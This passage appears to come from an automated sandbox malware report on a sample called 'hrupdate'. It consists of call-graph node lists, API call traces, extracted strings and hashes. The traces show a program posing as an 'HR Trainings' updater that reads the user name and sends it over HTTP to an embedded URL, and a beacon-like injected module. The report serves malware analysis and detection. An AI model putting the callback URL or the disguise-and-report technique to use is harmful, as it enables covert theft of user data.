16721->16718 16723 4fe04b5 VirtualAlloc 16722->16723 16725 4fe04fc 16723->16725 16725->16660 16726->16667 16742 4fdf44c TlsGetValue 16727->16742 16730 4fdf611 SetLastError 16730->16540 16731 4fdf5c3 16747 4fe6a12 16731->16747 16734 4fdf3d1 __decode_pointer 6 API calls 16735 4fdf5e9 16734->16735 16736 4fdf608 16735->16736 16737 4fdf5f0 16735->16737 16739 4fdd93e ___wtomb_environ 63 API calls 16736->16739 16752 4fdf4bd 16737->16752 16740 4fdf60e 16739->16740 16740->16730 16741 4fdf5f8 GetCurrentThreadId 16741->16730 16743 4fdf47c 16742->16743 16744 4fdf461 16742->16744 16743->16730 16743->16731 16745 4fdf3d1 __decode_pointer 6 API calls 16744->16745 16746 4fdf46c TlsSetValue 16745->16746 16746->16743 16750 4fe6a1b 16747->16750 16749 4fdf5cf 16749->16730 16749->16734 16750->16749 16751 4fe6a39 Sleep 16750->16751 16770 4feb2dc 16750->16770 16751->16750 16787 4fe0b6c 16752->16787 16754 4fdf4c9 GetModuleHandleW 16755 4fdf4d9 16754->16755 16756 4fdf4df 16754->16756 16757 4fddfdd __crt_waiting_on_module_handle 2 API calls 16755->16757 16758 4fdf51b 16756->16758 16759 4fdf4f7 GetProcAddress GetProcAddress 16756->16759 16757->16756 16760 4fe0075 __lock 62 API calls 16758->16760 16759->16758 16761 4fdf53a InterlockedIncrement 16760->16761 16788 4fdf592 16761->16788 16764 4fe0075 __lock 62 API calls 16765 4fdf55b 16764->16765 16791 4fe62e4 InterlockedIncrement 16765->16791 16767 4fdf579 16803 4fdf59b 16767->16803 16769 4fdf586 __lseeki64 16769->16741 16771 4feb2e8 __lseeki64 16770->16771 16772 4feb300 16771->16772 16782 4feb31f _memset 16771->16782 16773 4fdfe0c __filbuf 65 API calls 16772->16773 16774 4feb305 16773->16774 16775 4fe1df7 __filbuf 6 API calls 16774->16775 16777 4feb315 __lseeki64 16775->16777 16776 4feb391 RtlAllocateHeap 16776->16782 16777->16750 16778 4fe0f4f __calloc_impl 6 API calls 16778->16782 16779 4fe0075 __lock 65 API calls 16779->16782 16780 4fe0887 ___sbh_alloc_block 5 API calls 16780->16782 16782->16776 16782->16777 16782->16778 16782->16779 
16782->16780 16783 4feb3d8 16782->16783 16786 4fdff9b RtlLeaveCriticalSection 16783->16786 16785 4feb3df 16785->16782 16786->16785 16787->16754 16806 4fdff9b RtlLeaveCriticalSection 16788->16806 16790 4fdf554 16790->16764 16792 4fe6305 16791->16792 16793 4fe6302 InterlockedIncrement 16791->16793 16794 4fe630f InterlockedIncrement 16792->16794 16795 4fe6312 16792->16795 16793->16792 16794->16795 16796 4fe631f 16795->16796 16797 4fe631c InterlockedIncrement 16795->16797 16798 4fe6329 InterlockedIncrement 16796->16798 16800 4fe632c 16796->16800 16797->16796 16798->16800 16799 4fe6345 InterlockedIncrement 16799->16800 16800->16799 16801 4fe6355 InterlockedIncrement 16800->16801 16802 4fe6360 InterlockedIncrement 16800->16802 16801->16800 16802->16767 16807 4fdff9b RtlLeaveCriticalSection 16803->16807 16805 4fdf5a2 16805->16769 16806->16790 16807->16805 16809 4fe0117 16808->16809 16813 4fe03b9 16808->16813 16810 4fe0303 VirtualFree 16809->16810 16809->16813 16811 4fe0367 16810->16811 16812 4fe0376 VirtualFree HeapFree 16811->16812 16811->16813 16812->16813 16813->16476 16817 4fdff9b RtlLeaveCriticalSection 16814->16817 16816 4fdd99b 16816->16480 16817->16816 16819 4fc8eed 16818->16819 16820 4fc8ee6 16818->16820 16819->16447 16822 4fc8da9 16820->16822 16823 4fc8db9 16822->16823 16824 4fc8db5 16822->16824 16825 4fc8e15 16823->16825 16826 4fdda1b _malloc 66 API calls 16823->16826 16824->16819 16836 4fd3d4b 16825->16836 16829 4fc8dcf _memset 16826->16829 16828 4fc8e2b 16828->16819 16829->16828 16831 4fd41db 16829->16831 16842 4fd4173 CryptAcquireContextA 16831->16842 16834 4fd41fa 16834->16825 16837 4fd3d5d 16836->16837 16841 4fd3d59 16836->16841 16838 4fd3d94 16837->16838 16839 4fdd93e ___wtomb_environ 66 API calls 16837->16839 16837->16841 16840 4fdda1b _malloc 66 API calls 16838->16840 16839->16838 16840->16841 16841->16828 16843 4fd419c CryptAcquireContextA 16842->16843 16844 4fd41b3 CryptGenRandom 16842->16844 16843->16844 16845 4fd41af 16843->16845 16846 4fd41c8 
CryptReleaseContext 16844->16846 16847 4fd41d7 16844->16847 16845->16834 16848 4fd40fd 16845->16848 16846->16845 16847->16846 16849 4fd4117 16848->16849 16850 4fd416b 16849->16850 16851 4fedf1b GetSystemTimeAsFileTime _clock 16849->16851 16850->16834 16851->16849 16853 4fdda1b _malloc 66 API calls 16852->16853 16854 4fcbf6a 16853->16854 16855 4fdda1b _malloc 66 API calls 16854->16855 16858 4fcbf87 _memset 16854->16858 16856 4fcbf7a 16855->16856 16857 4fdd93e ___wtomb_environ 66 API calls 16856->16857 16856->16858 16857->16858 16858->16324 17138 4fddc25 GetSystemTimeAsFileTime 16859->17138 16861 4fd0bcd 17140 4fddfa9 16861->17140 16864 4fdda1b _malloc 66 API calls 16865 4fd0c14 _memset _memcpy_s 16864->16865 17143 4fdf295 16865->17143 16867 4fd0cad 16868 4fdd93e ___wtomb_environ 66 API calls 16867->16868 16870 4fc35cd 16868->16870 16869 4fdf295 _strtok 66 API calls 16871 4fd0c3b _strncpy 16869->16871 16872 4fc970c 16870->16872 16871->16867 16871->16869 16873 4fddc25 __time64 GetSystemTimeAsFileTime 16872->16873 16874 4fc9722 16873->16874 16875 4fddfa9 66 API calls 16874->16875 16876 4fc9729 16875->16876 17153 4fc979e 16876->17153 16879 4fd3b98 16880 4fd3bb1 16879->16880 16881 4fd3bc4 _memset 16879->16881 16882 4fd3bba 16880->16882 16883 4fd3bc6 16880->16883 16881->16330 16884 4fdda1b _malloc 66 API calls 16882->16884 17165 4fdf961 16883->17165 16884->16881 16887 4fc6ddd 16886->16887 16888 4fc6de1 16887->16888 16889 4fc6de3 GetLocalTime 16887->16889 16888->16334 16890 4fc6df5 16889->16890 16890->16334 16893 4fc6e8a 16891->16893 16892 4fc3629 16892->16343 16892->16344 16893->16892 17205 4fcff6b 16893->17205 16895 4fc6ec5 17209 4fcff96 16895->17209 16899 4fc6f02 16897->16899 16898 4fc3637 16898->16348 16898->16350 16899->16898 16900 4fc6f9d htonl htonl 16899->16900 16900->16898 16901 4fc6fbd 16900->16901 16902 4fdda1b _malloc 66 API calls 16901->16902 16903 4fc6fc6 _memcpy_s 16902->16903 16904 4fc701b _memset 16903->16904 16905 4fcff6b 116 API calls 16903->16905 16907 
4fdd93e ___wtomb_environ 66 API calls 16904->16907 16906 4fc6ffb 16905->16906 16908 4fcff96 102 API calls 16906->16908 16907->16898 16908->16904 16910 4fd41db 5 API calls 16909->16910 16911 4fcbe33 16910->16911 17656 4fcfd1f 16911->17656 16914 4fddfa9 66 API calls 16915 4fcbe57 16914->16915 17663 4fc34d6 16915->17663 16917 4fcbe5d 16918 4fcbe76 GetCurrentProcess 16917->16918 16919 4fcbe70 16917->16919 17721 4fc797e GetModuleHandleA GetProcAddress 16918->17721 17666 4fd359b AllocateAndInitializeSid 16919->17666 16925 4fcbea6 17672 4fc5851 16925->17672 16928 4fc5851 htonl 16929 4fcbec2 16928->16929 16930 4fc5851 htonl 16929->16930 16931 4fcbecf 16930->16931 17676 4fc5802 htonl 16931->17676 16934 4fc5802 2 API calls 16935 4fcbee4 16934->16935 17679 4fc581f htons 16935->17679 16943 4fcbf05 _memset _memcpy_s 17714 4fcfdf8 16943->17714 16945 4fcbf4a _memset 16945->16359 16948 4fd3ded 16946->16948 16947 4fc36b4 16947->16362 16947->16364 16948->16947 16949 4fd3e34 htonl htonl 16948->16949 16949->16947 16952 4fc8d61 16950->16952 16951 4fc8d6f 16951->16386 16952->16951 17894 4fc8be2 16952->17894 16955 4fd0fa9 16954->16955 16956 4fd0fa2 16954->16956 16959 4fd0fa7 16955->16959 18242 4fd0e17 16955->18242 18234 4fd0d96 16956->18234 16959->16386 18257 4fd3016 16960->18257 16965 4fc5cbf 16967 4fc5c6a 16967->16965 16972 4fc62ae 16971->16972 16973 4fc62a9 16971->16973 16974 4fd3016 RevertToSelf 16972->16974 16973->16386 16975 4fc62b3 16974->16975 18304 4fc609e 16975->18304 16980 4fd105a 16979->16980 16981 4fd106b 16980->16981 16982 4fd1080 16980->16982 16983 4fd107e 16980->16983 16981->16983 18352 4fd1217 16981->18352 16982->16983 16984 4fd1217 139 API calls 16982->16984 16983->16386 16984->16983 18393 4fcc902 16986->18393 16989 4fccda1 18421 4fccc39 16989->18421 16992 4fccdaa GetTickCount 16992->16989 16993 4fccdb0 16992->16993 18432 4fccb9b 16993->18432 16997 4fd41db 5 API calls 16996->16997 16998 4fc648b 16997->16998 16998->16386 18466 4fc8b21 16999->18466 17002 4fc8da9 71 API 
calls 17004 4fc8abb 17002->17004 17003 4fc8ace Sleep 17006 4fc8ad5 17003->17006 17004->17003 18472 4fc8e5e 17004->18472 17006->16386 17007 4fc8ac9 17007->17003 17007->17006 17009 4fd2f56 17008->17009 17010 4fd2f8c 17009->17010 17011 4fc8b69 73 API calls 17009->17011 17013 4fc4fb0 155 API calls 17010->17013 17012 4fd2f87 17011->17012 18550 4fc8d7f 17012->18550 17015 4fd2f94 17013->17015 18554 4fcb288 17015->18554 17020 4fd2fe9 17021 4fd300e ExitProcess 17020->17021 17022 4fd2fee 17020->17022 18571 4fd1e65 17022->18571 17023 4fd2fa9 Sleep 17023->17023 17024 4fd2fb6 17025 4fd2fe6 RtlExitUserThread 17024->17025 18567 4fd2f25 17024->18567 17025->17020 17030 4fc9042 66 API calls 17031 4fd2fd4 17030->17031 17032 4fc8f1a 71 API calls 17031->17032 17033 4fd2fe3 17032->17033 17033->17025 17035 4fc9b5e __mbschr_l 17034->17035 17036 4fc9ce6 17035->17036 17037 4fdda1b _malloc 66 API calls 17035->17037 17036->16386 17038 4fc9ba3 17037->17038 17039 4fdda1b _malloc 66 API calls 17038->17039 17040 4fc9bae _memset _memcpy_s 17039->17040 17041 4fddfbb _rand 66 API calls 17040->17041 17042 4fc9c23 _memset _memcpy_s 17040->17042 17041->17042 17043 4fc9b4c 66 API calls 17042->17043 17044 4fc9cc3 17043->17044 17045 4fdd93e ___wtomb_environ 66 API calls 17044->17045 17049 4fcfb31 17048->17049 17065 4fcfb2a 17048->17065 17050 4fdda1b _malloc 66 API calls 17049->17050 17051 4fcfb3a 17050->17051 17055 4fcfb4f 17051->17055 18623 4fd6555 17051->18623 17053 4fdd93e ___wtomb_environ 66 API calls 17053->17065 17054 4fde27d 66 API calls 17062 4fcfb6a _memcpy_s 17054->17062 17055->17053 17056 4fd6204 5 API calls 17056->17062 17057 4fcbff3 htonl 17057->17062 17058 4fcfc1c 17059 4fdd93e ___wtomb_environ 66 API calls 17058->17059 17062->17054 17062->17055 17062->17056 17062->17057 17062->17058 17063 4fcfc63 _memcpy_s 17062->17063 17064 4fdd93e ___wtomb_environ 66 API calls 17063->17064 17064->17065 17065->16386 17067 4fce1aa htonl htonl 17066->17067 17069 4fce1e7 _memset 17066->17069 17068 4fce1ca 
17067->17068 17067->17069 17068->17067 17068->17069 17069->16386 17071 4fc858d 17070->17071 17072 4fc85d0 17070->17072 17074 4fc85a4 17071->17074 18665 4fc8496 17071->18665 17072->16397 17074->17072 17075 4fc85d2 17074->17075 17077 4fdd93e ___wtomb_environ 66 API calls 17074->17077 17076 4fdd93e ___wtomb_environ 66 API calls 17075->17076 17076->17072 17077->17074 17083 4fcb60a 17078->17083 17079 4fcb610 GetTickCount 17080 4fcb616 GetTickCount htonl 17079->17080 17079->17083 17082 4fc3495 139 API calls 17080->17082 17081 4fcb645 17081->16397 17082->17083 17083->17079 17083->17081 17085 4fcab4e 17084->17085 17096 4fcac10 17084->17096 17086 4fdda1b _malloc 66 API calls 17085->17086 17093 4fcab58 17086->17093 17087 4fcab5b htonl htonl htonl 17087->17093 17091 4fc3495 139 API calls 17091->17093 17092 4fcabcc WaitForSingleObject 17092->17093 17093->17087 17093->17091 17093->17092 17094 4fcabfb _memset 17093->17094 18951 4fcace9 17093->18951 18960 4fcac1d PeekNamedPipe 17093->18960 18966 4fcac82 17093->18966 17095 4fdd93e ___wtomb_environ 66 API calls 17094->17095 17095->17096 17096->16397 17098 4fc3495 139 API calls 17097->17098 17099 4fc6434 17098->17099 17099->16397 17101 4fc5de9 _memset 17100->17101 17102 4fc6008 17101->17102 17103 4fcda45 66 API calls 17101->17103 17102->16397 17104 4fc5e23 17103->17104 17105 4fc5e7d 17104->17105 17107 4fc5e42 17104->17107 17106 4fddb76 __snprintf 102 API calls 17105->17106 17112 4fc5e6a _memset 17106->17112 17109 4fc9b4c 66 API calls 17107->17109 17108 4fddb76 __snprintf 102 API calls 17113 4fc5eb3 17108->17113 17110 4fc5e4f 17109->17110 17111 4fddb76 __snprintf 102 API calls 17110->17111 17111->17112 17112->17108 17139 4fddc55 __aulldiv 17138->17139 17139->16861 17148 4fdf61d 17140->17148 17144 4fdf61d __getptd 66 API calls 17143->17144 17145 4fdf2b8 17144->17145 17146 4fe555e GetPdbDll 5 API calls 17145->17146 17147 4fdf354 17146->17147 17147->16871 17149 4fdf5a4 __getptd_noexit 66 API calls 17148->17149 17150 4fdf625 17149->17150 
17151 4fd0bd3 17150->17151 17152 4fde00d __amsg_exit 66 API calls 17150->17152 17151->16864 17152->17151 17154 4fc97b0 17153->17154 17155 4fc35d5 17153->17155 17162 4fcc036 17154->17162 17155->16879 17157 4fdda1b _malloc 66 API calls 17161 4fc97c8 17157->17161 17158 4fcc271 htons 17158->17161 17159 4fd3b98 71 API calls 17159->17161 17160 4fcc036 htons 17160->17161 17161->17155 17161->17157 17161->17158 17161->17159 17161->17160 17163 4fcc047 htons 17162->17163 17164 4fcc043 17162->17164 17163->17164 17164->17161 17166 4fdf96d __lseeki64 17165->17166 17167 4fdf974 17166->17167 17168 4fdf982 17166->17168 17169 4fdda1b _malloc 66 API calls 17167->17169 17170 4fdf989 17168->17170 17171 4fdf995 17168->17171 17187 4fdf97c __dosmaperr __lseeki64 17169->17187 17172 4fdd93e ___wtomb_environ 66 API calls 17170->17172 17177 4fdfb07 17171->17177 17199 4fdf9a2 _memcpy_s ___sbh_resize_block ___sbh_find_block 17171->17199 17172->17187 17173 4fdfb3a 17175 4fe0f4f __calloc_impl 6 API calls 17173->17175 17174 4fdfb0c RtlReAllocateHeap 17174->17177 17174->17187 17178 4fdfb40 17175->17178 17176 4fe0075 __lock 66 API calls 17176->17199 17177->17173 17177->17174 17179 4fdfb5e 17177->17179 17181 4fe0f4f __calloc_impl 6 API calls 17177->17181 17184 4fdfb54 17177->17184 17180 4fdfe0c __filbuf 66 API calls 17178->17180 17182 4fdfe0c __filbuf 66 API calls 17179->17182 17179->17187 17180->17187 17181->17177 17183 4fdfb67 GetLastError 17182->17183 17183->17187 17186 4fdfe0c __filbuf 66 API calls 17184->17186 17189 4fdfad5 17186->17189 17187->16881 17188 4fdfa2d RtlAllocateHeap 17188->17199 17189->17187 17191 4fdfada GetLastError 17189->17191 17190 4fdfa82 RtlReAllocateHeap 17190->17199 17191->17187 17192 4fe0887 ___sbh_alloc_block 5 API calls 17192->17199 17193 4fdfaed 17193->17187 17195 4fdfe0c __filbuf 66 API calls 17193->17195 17194 4fe0f4f __calloc_impl 6 API calls 17194->17199 17196 4fdfafa 17195->17196 17196->17183 17196->17187 17197 4fdfad0 17198 4fdfe0c __filbuf 66 API calls 
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01DC4
                                                                • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01DFD
                                                                  • Part of subcall function 00B02730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B0275D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01EC0
                                                                • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01EFB
                                                                • memchr.VCRUNTIME140 ref: 00B01F1C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01F9B
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B0201C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,21DC2236), ref: 00B020CB
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00B042CD,00000000,00B04308,00000001,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B0213B
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                • inet_addr.WS2_32(00000000), ref: 00B02273
                                                                • gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                • inet_addr.WS2_32(00000000), ref: 00B02283
                                                                • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00B02296
                                                                • htons.WS2_32(00000050), ref: 00B022BB
                                                                • connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                  • Part of subcall function 00B02730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B0280C
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 00B02414
                                                                • memset.VCRUNTIME140 ref: 00B02429
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B02445
                                                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00B02465
                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 00B0247D
                                                                • memset.VCRUNTIME140 ref: 00B02495
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B024AC
                                                                • strstr.VCRUNTIME140 ref: 00B024C7
                                                                • strstr.VCRUNTIME140 ref: 00B024DA
                                                                • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00B02508
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00B02530
                                                                • closesocket.WS2_32(?), ref: 00B02563
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02595
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B025D1
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02628
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memcpy$inet_addrmemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsmemchrreallocsendsocketstrncpy
                                                                • String ID: $$GET %s HTTP/1.0$Host: %s$http://$https://
                                                                • API String ID: 241144766-2968714747
                                                                • Opcode ID: 1bff673d29df2f567242d15862eba1c75a0a6392bb2a835453657ef1e35d0b23
                                                                • Instruction ID: 9ae3fafadb9f900987a09bae04eb0fb17ed971618cb8e38fddd6177bb4b39ed5
                                                                • Opcode Fuzzy Hash: 1bff673d29df2f567242d15862eba1c75a0a6392bb2a835453657ef1e35d0b23
                                                                • Instruction Fuzzy Hash: CC52B071A001189FDB15DF68CC98BADBFB6EF55314F1442E8E509A72C1DB329E89CB60

                                                                Control-flow Graph

                                                                APIs
                                                                • WSAStartup.WS2_32(00000101,?), ref: 00B014D0
                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00B014EE
                                                                • wcstombs_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000101,?,00000101), ref: 00B01513
                                                                • memset.VCRUNTIME140 ref: 00B0155E
                                                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000400), ref: 00B01579
                                                                  • Part of subcall function 00B02180: socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                  • Part of subcall function 00B02180: inet_addr.WS2_32(00000000), ref: 00B02273
                                                                  • Part of subcall function 00B02180: gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                  • Part of subcall function 00B02180: htons.WS2_32(00000050), ref: 00B022BB
                                                                  • Part of subcall function 00B02180: connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                • WSACleanup.WS2_32 ref: 00B015A7
                                                                • LoadStringW.USER32(?,00000067,SibcorUpdate,00000064), ref: 00B015BD
                                                                • LoadStringW.USER32(?,0000006D,SIBCORUPDATE,00000064), ref: 00B015C9
                                                                • LoadIconW.USER32(?,0000006B), ref: 00B0160C
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B0161B
                                                                • LoadIconW.USER32(?,0000006C), ref: 00B0164D
                                                                • RegisterClassExW.USER32(00000030), ref: 00B0165C
                                                                • CreateWindowExW.USER32(00000000,SIBCORUPDATE,SibcorUpdate,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00B0168E
                                                                • UpdateWindow.USER32(00000000), ref: 00B0169F
                                                                • LoadIconW.USER32(?,0000006B), ref: 00B016A8
                                                                • lstrcpyW.KERNEL32(?,HR Trainings), ref: 00B016F2
                                                                • Shell_NotifyIconW.SHELL32(00000000,000003BC), ref: 00B01701
                                                                • LoadAcceleratorsW.USER32(?,0000006D), ref: 00B0170A
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B01819
                                                                • DialogBoxParamW.USER32(?,00000067,?,00B01A20,00000000), ref: 00B01839
                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B01859
                                                                • TranslateMessage.USER32(?), ref: 00B0186A
                                                                • DispatchMessageW.USER32(?), ref: 00B01877
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B0188A
                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B018A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Load$IconMessage$StringTranslateWindow$AcceleratorAcceleratorsClassCleanupCreateCursorDialogDispatchNameNotifyParamRegisterShell_StartupUpdateUserconnectgethostbynamehtonsinet_addrlstrcpymemsetsocketstrncatterminatewcstombs_s
                                                                • String ID: @qv$HR Trainings$SIBCORUPDATE$SibcorUpdate$http://www.hrtraining.ro/trakingu/$slv
                                                                • API String ID: 821071236-801964392
                                                                • Opcode ID: b083f8d62007d88ae7714f99ed62ea6e58347ecd31209255204e3746800bfbe6
                                                                • Instruction ID: 4b583c298d7aa92c601f90eae20904b678de3e5909418f225bb64626bbbce684
                                                                • Opcode Fuzzy Hash: b083f8d62007d88ae7714f99ed62ea6e58347ecd31209255204e3746800bfbe6
                                                                • Instruction Fuzzy Hash: 5BC14AB1D4031D9BDB208F54DC49BEABBB8EB14705F0041D9E609A72D0EBB56B94CF91

                                                                Control-flow Graph

                                                                control_flow_graph 786 4fd4173-4fd419a CryptAcquireContextA 787 4fd419c-4fd41ad CryptAcquireContextA 786->787 788 4fd41b3-4fd41c6 CryptGenRandom 786->788 787->788 789 4fd41af-4fd41b2 787->789 790 4fd41c8-4fd41d5 CryptReleaseContext 788->790 791 4fd41d7-4fd41d9 788->791 790->789 791->790
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,04FF8490,00000001,F0000020,00000080,00000000,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD4196
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,04FF8490,00000001,F0000028,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD41A9
                                                                • CryptGenRandom.ADVAPI32(00000000,04FCBE33,?,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD41BD
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,04FD41E9,?,04FCBE33,?,04FCBE33,?), ref: 04FD41CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$Acquire$RandomRelease
                                                                • String ID:
                                                                • API String ID: 685801729-0
                                                                • Opcode ID: e41b14b3f58796d468a5004a3fd078f86d6e2c302e3a3753ab5fd9f70f0c400d
                                                                • Instruction ID: d3a5fce6e6ab0cfcae319fecc83cf3f246ff188af8941330775f8a31f1194d8c
                                                                • Opcode Fuzzy Hash: e41b14b3f58796d468a5004a3fd078f86d6e2c302e3a3753ab5fd9f70f0c400d
                                                                • Instruction Fuzzy Hash: 7DF0AF36E41228FBDF218A91DD09F8E7B6DDF49B64F100011FE00B2040D7B0EA019BA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f15bf9834b2d04e925b24a2663e6d41f2882dfa1a279f5640d2de6c245aac20d
                                                                • Instruction ID: 0e6672bd4912d781e6c354683cb95ba96bc9248861012f27e8461038d6080740
                                                                • Opcode Fuzzy Hash: f15bf9834b2d04e925b24a2663e6d41f2882dfa1a279f5640d2de6c245aac20d
                                                                • Instruction Fuzzy Hash: 2AD0123264910D9EEB11EE18FD415BDB3A3E740A95F840AD9EA01025447A2B7C275691

                                                                Control-flow Graph

                                                                control_flow_graph 222 b02180-b0226a call b01ca0 socket 225 b022e4-b022e6 222->225 226 b0226c-b02279 inet_addr 222->226 227 b022ec-b02317 call b01050 225->227 228 b02283-b02296 inet_addr gethostbyaddr 226->228 229 b0227b-b02281 gethostbyname 226->229 235 b02320-b02333 227->235 231 b0229c-b0229e 228->231 229->231 233 b022a0-b022da htons connect 231->233 234 b022dc-b022e1 231->234 233->227 233->234 234->225 235->235 236 b02335-b0233c 235->236 237 b02340-b02348 236->237 237->237 238 b0234a-b0238c call b01050 237->238 241 b02390-b02395 238->241 241->241 242 b02397-b0239f 241->242 243 b023a0-b023a6 242->243 243->243 244 b023a8-b023bd 243->244 245 b023c0-b023c8 244->245 245->245 246 b023ca-b023e3 245->246 247 b023e4-b023ec 246->247 247->247 248 b023ee-b023fd 247->248 249 b02400-b02405 248->249 249->249 250 b02407-b0244f send memset recv 249->250 251 b02451-b024b6 realloc memcpy memset recv 250->251 252 b024b8-b024d2 strstr 250->252 251->251 251->252 253 b024d4-b024e5 strstr 252->253 254 b024e7-b024eb 252->254 253->254 255 b024ee-b02572 call b02e0d memcpy call b02e0d strncpy call b02dff closesocket 253->255 254->255 262 b02574-b02583 255->262 263 b025a5-b025ae 255->263 264 b02585-b02593 262->264 265 b0259b-b025a2 call b02dff 262->265 266 b025b0-b025bf 263->266 267 b025e1-b02605 263->267 264->265 268 b02595 _invalid_parameter_noinfo_noreturn 264->268 265->263 270 b025c1-b025cf 266->270 271 b025d7-b025de call b02dff 266->271 272 b02607-b02616 267->272 273 b02638-b02659 call b02dbe 267->273 268->265 270->271 276 b025d1 _invalid_parameter_noinfo_noreturn 270->276 271->267 278 b02618-b02626 272->278 279 b0262e-b02635 call b02dff 272->279 276->271 278->279 280 b02628 _invalid_parameter_noinfo_noreturn 278->280 279->273 280->279
                                                                APIs
